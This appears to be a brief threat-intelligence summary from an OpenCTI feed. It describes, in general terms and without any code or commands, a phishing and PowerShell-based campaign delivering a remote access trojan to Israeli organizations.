From ClickFix to Command: A Full PowerShell Attack Chain

SUMMARY :

A targeted intrusion campaign impacting Israeli organizations has been identified, leveraging compromised internal email infrastructure to distribute phishing messages. The attack uses a multi-stage, PowerShell-based infection chain, culminating in the delivery of a remote access trojan (RAT). Key characteristics include a full PowerShell-based delivery chain, obfuscated payloads, evidence of lateral movement, and potential overlap with MuddyWater campaigns. The attack begins with phishing emails, progresses through a spoofed Microsoft Teams page, and uses social engineering to execute malicious PowerShell commands. The payload retrieves additional data, deploys a RAT, and establishes communication with a command and control server. The campaign demonstrates the effectiveness of living-off-the-land techniques, layered evasion, and adaptive C2 communication.

OPENCTI LABELS :

powershell,rat,phishing,social engineering,lateral movement,obfuscation,c2 communication,israeli targets,powershell rat


Open in NetmanageIT OpenCTI Public Instance with below link!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


From ClickFix to Command: A Full PowerShell Attack Chain